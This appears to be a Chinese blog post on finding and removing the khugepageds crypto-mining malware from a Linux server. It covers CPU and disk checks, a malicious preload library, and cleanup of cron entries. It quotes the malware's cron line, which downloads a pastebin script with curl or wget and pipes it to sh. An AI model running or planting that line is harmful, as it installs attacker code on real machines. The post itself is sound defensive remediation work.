Linux服务器CPU占用100%,Error: No space left on device,khugepageds挖矿病毒引起

最近部署RabbitMQ运行的时候提示:Error: No space left on device(磁盘空间不足)

df -h 查看磁盘使用情况,发现磁盘并没有占用满

在这里插入图片描述

df -i 继续查看 inode 使用情况,发现也没有占用满

在这里插入图片描述

查看阿里云服务器控制台,CPU使用显示占用100%

运行# top发现%Cpu(s): 2.0 us, 1.7 sy, 0.0 ni,96.0 id, 0.0 wa, 0.0 hi, 0.3 si, 0.0 st中 id 为96%,说明CPU闲置96%,CPU占用不为100%,与事实情况不符。这个时候你就要怀疑是否病毒造成了。

在这里插入图片描述

Top 命令显示参数解释

%Cpu(s): 2.0 us, 1.7 sy,  0.0 ni,  96.0 id,  0.0 wa,  0.0 hi,  0.3 si,  0.0 st

其中us 2.0% 并不代表消耗就是2.0%,这是表示用户占用的cpu,而 sy 表示系统占用的cpu ,id 表示闲置的。

所以查看服务器的cpu消耗,应该查看id的百分比,占用就是1-id%

查看计划任务# crontab -l,发现远程脚本的定时任务

*/15 * * * * (curl -fsSL https://pastebin.com/raw/TS4NeUnd||wget -q -O- https://pastebin.com/raw/TS4NeUnd)|sh


处理远程病毒脚本

排查清理 /etc/ld.so.preload 中是否加载有恶意动态链接库

vim /etc/ld.so.preload
发现存在恶意动态链接库

在这里插入图片描述

删除/usr/local/lib/libcryptod.so恶意动态链接库
rm -rf /usr/local/lib/libcryptod.so
修改/etc/ld.so.preload此文件中的内容

按i键进入编辑模式,删除/usr/local/lib/libcryptod.so字段,按Esc键退出编辑模式,w!强制保存,q退出

使用top,查看发现为Linux挖矿病毒khugepageds,记住其PID,并杀死:kill -9 17957
在这里插入图片描述

排查清理可能残留的恶意文件:
  • 删除文件rm -f /usr/sbin/watchdogs /etc/init.d/watchdogs
  • 分别编辑 vim /var/spool/cron/rootvim /etc/cron.d/root文件,删除定时内容
重启定时任务
systemctl reload crond.service

执行crontab -l此时发现病毒的定时任务已删除

在这里插入图片描述

再查看阿里云服务器CPU占用情况,发现CPU占用恢复正常

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值